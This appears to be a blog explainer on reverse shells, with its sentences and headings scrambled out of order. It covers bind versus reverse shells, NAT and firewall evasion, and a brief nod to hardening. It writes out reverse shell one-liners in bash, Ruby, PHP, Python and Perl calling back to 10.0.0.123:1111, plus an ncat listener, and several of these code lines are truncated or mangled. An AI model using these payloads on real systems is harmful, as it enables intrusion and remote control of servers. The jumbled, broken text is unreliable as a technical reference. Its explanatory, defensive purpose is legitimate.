![]() You can mitigate the risk by selectively hardening your system: Unfortunately, there’s also no surefire way of blocking reverse shell connections on a networked system, especially a server. Unless you are deliberately using reverse shells for remote administration, any reverse shell connections are likely to be malicious. Ruby is another popular web application language that’s likely to have an interpreter on a general-purpose server system: ruby -rsocket -e'f=TCPSocket.open("10.0.0.123",1111).to_i exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)' Preventing Reverse Shells Java is likely to be available on application servers: r = Runtime.getRuntime() Most web servers will have PHP installed, and this too can provide a reverse shell vector (if the file descriptor &3 doesn’t work, you can try subsequent numbers): php -r '$sock=fsockopen("10.0.0.123",1111) exec("/bin/sh -i &3 2>&3") ' Java Reverse Shell ![]() With Python continuing to gain popularity, there’s a good chance it’s available on the target server and can be used to execute a script like: python -c 'import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.0.0.123",1111)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call() ' PHP Reverse Shell If the target machine runs Linux, it’s a good idea to start with bash, as nearly all Linux systems come with this system shell: /bin/bash -i >& /dev/tcp/10.0.0.123/1111 0>&1 Perl Reverse ShellĪs with bash, a perl interpreter should be available on most Linux servers, so a perl command might be another way to obtain a reverse shell: perl -e 'use Socket $i="10.0.0.123" $p=1111 socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")) if(connect(S,sockaddr_in($p,inet_aton($i)))) ' Python Reverse Shell While the examples below are for Linux and other Unix-like systems, many of them will also work on Windows if you change the command line interpreter call from /bin/sh -i to cmd.exe. Codes are typically one-liners to allow injection using a single command. Kali Linux also comes with a set of ready webshells, including reverse shells. Many ready reverse shell codes exist for various systems and languages – see pentestmonkey’s Reverse Shell Cheat Sheet for an extensive list. Now the attacker needs to (manually or automatically) execute code on the remote machine to connect to the listener. This will start a netcat listener on port 1111. On Linux, this can be as simple as one netcat command: ncat -l -p 1111 To start with, the attacker needs to start a listener process on their system to listen for reverse shell connections incoming to their IP address, for example 10.0.0.123. ![]() The injected code will often be a reverse shell script to provide a convenient command shell for further malicious activities. When attempting to compromise a server, an attacker may try to exploit a command injection vulnerability on the server system. Firewalls mostly filter incoming traffic, so an outgoing connection to a listening server will often succeed. For example, a piece of malware installed on a local workstation via a phishing email or a malicious website might initiate an outgoing connection to a command server and provide hackers with a reverse shell capability. However, they can also be used by cybercriminals to execute operating system commands on hosts protected from incoming connections by a firewall or other network security systems. Reverse shells are often the only way to perform remote maintenance on hosts behind a NAT, so they have legitimate administrative uses. But what if the remote host is not directly accessible, for example because it has no public IP or is protected by a firewall? In this situation, a reverse shell might be used, where the target machine initiates an outgoing connection to a listening network host and a shell session is established. ![]() To establish a typical remote shell, a machine controlled by the attacker connects to a remote network host and requests a shell session – this is called a bind shell. Let’s see how reverse shells work in practice and what you can do to prevent them. A reverse shell (also called a connect-back shell) can also be the only way to gain remote shell access across a NAT or firewall. Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack. ![]() A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the local host. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |